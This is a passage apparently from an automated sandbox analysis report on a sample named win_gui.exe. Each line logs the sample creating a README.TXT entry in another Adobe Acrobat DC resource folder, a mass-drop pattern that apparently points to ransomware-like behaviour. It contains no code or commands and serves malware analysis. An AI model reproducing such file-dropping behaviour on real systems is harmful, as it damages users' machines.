Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\versions\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\README.TXTJump to behavior
